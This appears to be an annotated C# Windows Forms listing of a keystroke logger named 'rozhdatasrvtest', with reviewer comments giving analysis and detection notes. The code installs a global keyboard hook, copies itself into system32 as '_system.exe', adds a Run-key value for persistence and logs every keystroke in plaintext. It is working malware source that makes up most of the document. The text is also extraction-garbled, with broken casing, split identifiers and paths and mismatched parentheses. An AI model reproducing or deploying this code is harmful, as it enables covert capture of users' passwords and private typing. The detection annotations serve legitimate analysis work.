Using system;
Using system. drawing;
Using system. collections;
Using system. componentmodel;
Using system. Windows. forms;
Using system. Data;
Using system. Threading;
Namespace rozhdatasrvtest
{
// Review note: form2 is the only form in this listing. Its button has an empty click handler;
// all behaviour runs from form2_load, which relocates the executable, writes a Run-key value,
// opens a log file and installs a keyboard hook. Taken together the listing is a keystroke
// logger with auto-start persistence, and is annotated here for analysis and detection.
// The text is extraction-damaged (keyword casing, spaces inside identifiers and paths,
// "button#click") and does not compile as printed.
/// <Summary>
/// Summary of form2.
/// </Summary>
Public class form2: system. Windows. Forms. Form
{
/// <Summary>
/// Required designer variables.
/// </Summary>
Private system. componentmodel. Container components = NULL;
// Keyboard hook wrapper (class hook); created with the form, installed in form2_load.
Private Hook myhook = new hook ();
// Writer for the keystroke log file (class report).
Private report myreport = new report ();
// File-relocation and Run-key helper (class registryreport); created in form2_load.
Private registryreport myregistryreport;
// Last event name and key name received from the hook; overwritten on every key event.
Private string keyevents, keydate;
Private system. Windows. Forms. tabcontrol tabcontrol1;
Private system. Windows. Forms. tabpage tabpage1;
Private system. Windows. Forms. Button button1;
Public form2 ()
{
//
// Required for Windows Form Designer support
//
Initializecomponent ();
//
// Todo: add Any constructor code after initializecomponent calls
//
}
/// <Summary>
/// Clear all resources in use.
/// </Summary>
// Disposes the designer container only; the keyboard hook is not removed here.
Protected override void dispose (bool disposing)
{
If (disposing)
{
If (components! = NULL)
{
Components. Dispose ();
}
}
Base. Dispose (disposing );
}
# Region code generated by Windows Form Designer
/// <Summary>
/// The designer supports the required methods-do not use the code editor to modify
/// Content of this method.
/// </Summary>
Private void initializecomponent ()
{
This. button1 = new system. Windows. Forms. Button ();
This. tabcontrol1 = new system. Windows. Forms. tabcontrol ();
This. tabpage1 = new system. Windows. Forms. tabpage ();
This. tabcontrol1.suspendlayout ();
This. suspendlayout ();
//
// Button1
//
This. button1.location = new system. Drawing. Point (160, 72 );
This. button1.name = "button1 ";
This. button1.tabindex = 0;
This. button1.text = "button1 ";
This. button1.click + = new system. eventhandler (this. button#click );
//
// Tabcontrol1
//
This. tabcontrol1.controls. Add (this. tabpage1 );
This. tabcontrol1.location = new system. Drawing. Point (32,120 );
This. tabcontrol1.name = "tabcontrol1 ";
This. tabcontrol1.selectedindex = 0;
This. tabcontrol1.tabindex = 1;
//
// Tabpage1
//
This. tabpage1.location = new system. Drawing. Point (4, 21 );
This. tabpage1.name = "tabpage1 ";
This. tabpage1.size = new system. Drawing. Size (192, 75 );
This. tabpage1.tabindex = 0;
This. tabpage1.text = "tabpage1 ";
//
// Form2
//
This. autoscalebasesize = new system. Drawing. Size (6, 14 );
This. clientsize = new system. Drawing. Size (292,266 );
This. Controls. Add (this. tabcontrol1 );
This. Controls. Add (this. button1 );
This. Name = "form2 ";
This. Text = "form2 ";
// The Load event is the single trigger for everything the sample does.
This. Load + = new system. eventhandler (this. form2_load );
This. tabcontrol1.resumelayout (false );
This. resumelayout (false );
}
# Endregion
// Empty handler: the button does nothing.
Private void button#click (Object sender, system. eventargs E)
{
}
// Runs when the form loads and performs, in order:
//   1. movefile     - moves the running executable to a fixed path under system32
//   2. registryrun  - writes that path into the current user's Run key
//   3. firstwrite   - appends a banner and timestamp to the log file
//   4. sethook      - installs the low-level keyboard hook (return value ignored)
//   5. subscribes myhook_keyboardevent to the hook's keyboardevent
// There is no exception handling here, and nothing in the visible listing calls unhook().
// For triage, steps 1-3 leave file and registry artifacts even if the hook never installs.
Private void form2_load (Object sender, system. eventargs E)
{
Myregistryreport = new registryreport ();
This. myregistryreport. movefile ();
This. myregistryreport. registryrun ();
This. myreport. firstwrite ();
This. myhook. sethook ();
This. myhook. keyboardevent + = new keyboardeventhandler (myhook_keyboardevent );
}
// Receives each key event from the hook, stores the event and key names in the fields above,
// and appends them to the log through report.writedate. Every key the hook reports is written
// in plaintext, so during incident response the log must be treated as containing credentials.
Private void myhook_keyboardevent (keyboardevents keyevent, keys key)
{
This. keyevents = keyevent. tostring ();
This. keydate = key. tostring ();
This. myreport. writedate (keyevents, keydate );
}
}
}
Hook.cs
Using system;
Using system. runtime. interopservices;
Using system. reflection;
Using system. Windows. forms;
Namespace rozhdatasrvtest
{
// Keyboard message identifiers the hook callback accepts. The numeric values are those of the
// Windows messages WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN and WM_SYSKEYUP; hookproc casts the
// wparam it receives to this enum and ignores any other value.
Public Enum keyboardevents
{
Keydown = 0x0100,
Keyup = 0x0101,
Systemkeydown = 0x0104,
Systemkeyup = 0x0105
}
// Sequential-layout structure that hookproc fills from the lparam pointer via
// Marshal.PtrToStructure. Only vkcode is read by the visible code; the field order presumably
// mirrors the native low-level keyboard hook structure - confirm against the Windows SDK.
[Structlayout (layoutkind. Sequential)]
Public struct keyboardhookstruct
{
Public int vkcode; // a virtual keyboard code between 1 and 254
Public int scancode; // indicates the hardware scan code.
Public int flags;
Public int time;
Public int dwextrainfo;
}
// Callback signature for subscribers of hook.keyboardevent: the kind of key message and the
// key it refers to. form2.myhook_keyboardevent is the only subscriber in this listing.
Public Delegate void keyboardeventhandler (keyboardevents keyevent, system. Windows. Forms. Keys key );
// Wrapper around the user32 window-hook API. sethook installs a hook of type wh_keyboard_ll
// (13) and hookproc raises keyboardevent for every key-down/key-up message it sees.
// Detection note: a process that imports SetWindowsHookEx from user32.dll and installs a
// low-level keyboard hook with thread id 0 without a user-visible reason for doing so is a
// common keylogger indicator; endpoint tooling that tracks hook installation, or static import
// inspection, will surface it.
Public class hook
{
// Raised from hookproc for each accepted key message.
Public event keyboardeventhandler keyboardevent;
// Hook type identifiers accepted by setwindowshookex. Only wh_keyboard_ll is used in this listing.
Public Enum hooktype
{
Wh_journalrecord = 0,
Wh_journalplayback = 1,
Wh_keyboard = 2,
Wh_getmessage = 3,
Wh_callwndproc = 4,
Wh_cbt = 5,
Wh_sysmsgfilter = 6,
Wh_mouse = 7,
Wh_hardware = 8,
Wh_debug = 9,
Wh_shell = 10,
Wh_foregroundidle = 11,
Wh_callwndprocret = 12,
Wh_keyboard_ll = 13,
Wh_mouse_ll = 14,
Wh_msgfilter =-1,
}
// Managed signature of the hook callback handed to setwindowshookex.
Public Delegate intptr hookproc (INT code, int wparam, intptr lparam );
// P/Invoke declarations for the three user32.dll hook functions: install, chain, remove.
[Dllimport ("user32.dll", charset = charset. Auto)]
Public static extern intptr setwindowshookex (hooktype, hookproc hook, intptr instance, int threadid );
[Dllimport ("user32.dll", charset = charset. Auto)]
Public static extern intptr callnexthookex (intptr hookhandle, int code, int wparam, intptr lparam );
[Dllimport ("user32.dll", charset = charset. Auto)]
Public static extern bool unhookwindowshookex (intptr hookhandle );
// Module handle of the executing assembly, passed to setwindowshookex.
Private intptr instance;
// Handle returned by setwindowshookex; zero until sethook succeeds.
Private intptr hookhandle;
// Always 0 in this listing; for SetWindowsHookEx a zero thread id means the hook is not
// limited to one thread.
Private int threadid;
// Delegate instance for hookproc, held in a field for the lifetime of this object.
Private hookproc hookprocex;
// Captures the module handle and prepares the callback delegate; installs nothing yet.
Public hook ()
{
This. instance =
Marshal. gethinstance (assembly. getexecutingassembly (). getmodules () [0]);
This. threadid = 0;
Hookhandle = intptr. zero;
Hookprocex = new hookproc (hookproc );
}
// Installs the low-level keyboard hook and reports whether a non-zero handle came back.
// NOTE(review): the return expression has unbalanced parentheses as printed (extraction damage).
Public bool sethook ()
{
This. hookhandle = setwindowshookex (hooktype. wh_keyboard_ll, hookprocex, this. instance, this. threadid );
Return (INT) hookhandle! = 0 );
}
// Hook callback. For code >= 0 it casts wparam to keyboardevents, passes anything that is not
// one of the four key messages straight to the next hook, otherwise reads the structure at
// lparam, converts vkcode to a Keys value and raises keyboardevent. The event is always
// forwarded with callnexthookex, so keystrokes still reach their target and the user sees
// no change in behaviour. The second argument to callnexthookex is the hook type constant,
// not the code value received.
Public intptr hookproc (INT code, int wparam, intptr lparam)
{
If (code> = 0)
{
Keyboardevents kevent = (keyboardevents) wparam;
If (kevent! = Keyboardevents. keydown &&
Kevent! = Keyboardevents. keyup &&
Kevent! = Keyboardevents. systemkeydown &&
Kevent! = Keyboardevents. systemkeyup)
{
Return callnexthookex (this. hookhandle, (INT) hooktype. wh_keyboard_ll, wparam, lparam );
}
Keyboardhookstruct mykey = new keyboardhookstruct ();
Type T = mykey. GetType ();
Mykey = (keyboardhookstruct) Marshal. ptrtostructure (lparam, t );
Keys keydata = (KEYS) mykey. vkcode;
Keyboardevent (kevent, keydata );
}
Return callnexthookex (this. hookhandle, (INT) hooktype. wh_keyboard_ll, wparam, lparam );
}
// Removes the hook and returns the API result. Nothing in the visible listing calls this, so
// the hook stays installed until the process exits.
Public bool unhook ()
{
Return hook. unhookwindowshookex (this. hookhandle );
}
}
}
Registryreport.cs
Using system;
Using system. IO;
Using Microsoft. Win32;
Using system. Windows. forms;
Namespace rozhdatasrvtest
{
// Persistence helper: relocates the executable and registers it under the current user's Run
// key (registry run-key auto-start, MITRE ATT&CK T1547.001).
// The path literals contain spaces inserted by extraction; the intended target is presumably
// C:\WINDOWS\system32\_system.exe - confirm against an original copy before using it as an
// indicator.
// Detection and mitigation notes:
//   - an executable appearing in system32 whose name imitates a system component;
//   - a value written under HKCU\Software\Microsoft\Windows\CurrentVersion\Run that points into
//     system32 (registry auditing, or Sysmon registry events 12/13, record this);
//   - writing to system32 needs administrative rights, so a standard-user session makes the
//     move fail, and no exception handling is visible around it.
Public class registryreport
{
Public registryreport ()
{
}
// Moves the running executable (Application.ExecutablePath) to the fixed system32 path, but
// only if no file exists there already; otherwise returns without doing anything.
Public void movefile ()
{
If (! File. exists ("C: \ WINDOWS \ system32 \ _ system.exe "))
{
File. Move (application. executablepath, "C: \ WINDOWS \ system32 \ _ system.exe ");
}
Else
Return;
}
// Creates or opens the current user's Run key and stores the relocated path in it. The value
// name is the empty string, i.e. the key's default value rather than a named entry, so review
// tooling that lists only named Run values should be checked for whether it shows it.
Public void registryrun ()
{
Registrykey key1 = registry. currentuser. createsubkey ("Software \ Microsoft \ Windows \ CurrentVersion \ Run ");
Key1.setvalue ("", "C: \ WINDOWS \ system32 \ _ system.exe ");
Key1.close ();
}
}
}
Report.cs
Using system;
Using system. IO;
Namespace rozhdatasrvtest
{
// Log writer. Both methods append to C:/Windows/system32/keyreport.txt (second StreamWriter
// argument true = append), opening and closing the file on every call.
// Defensive notes: the file is a host artifact of this sample and holds captured keystrokes
// in plaintext, so collect and protect it as sensitive evidence. A process repeatedly
// appending to a text file under system32 is itself unusual and visible to file-activity
// monitoring.
Public class report
{
Public Report ()
{
}
// Appends a banner line and a line with today's date and the current time. Unlike writedate
// there is no try/catch, so a failure to open the file propagates to the caller (form2_load).
Public void firstwrite ()
{
Streamwriter Sw = new streamwriter ("C:/Windows/system32/keyreport.txt", true );
Sw. writeline ("************** littlestudio *************");
Sw. writeline ("*********" + datetime. Today. year. tostring () + "."
+ Datetime. Today. Month. tostring () + "."
+ Datetime. Today. Day. tostring () + ""
+ Datetime. Now. Hour. tostring () + ":"
+ Datetime. Now. Minute. tostring () + ":"
+ Datetime. Now. Second. tostring () + "********");
Sw. Close ();
}
// Appends one line per key event: the key name, the literal "key", the event name and the
// current hour:minute:second. Despite its name, keydate carries the key name (see
// form2.myhook_keyboardevent). Any exception is swallowed by the empty catch, so write
// failures are silent and the logger leaves no error trace.
Public void writedate (string keyevents, string keydate)
{
Try
{
Streamwriter Sw = new streamwriter ("C:/Windows/system32/keyreport.txt", true );
Sw. writeline (keydate + "key" + keyevents + ""
+ Datetime. Now. Hour. tostring () + ":"
+ Datetime. Now. Minute. tostring () + ":"
+ Datetime. Now. Second. tostring ());
Sw. Close ();
}
Catch {}
Return;
}
}
}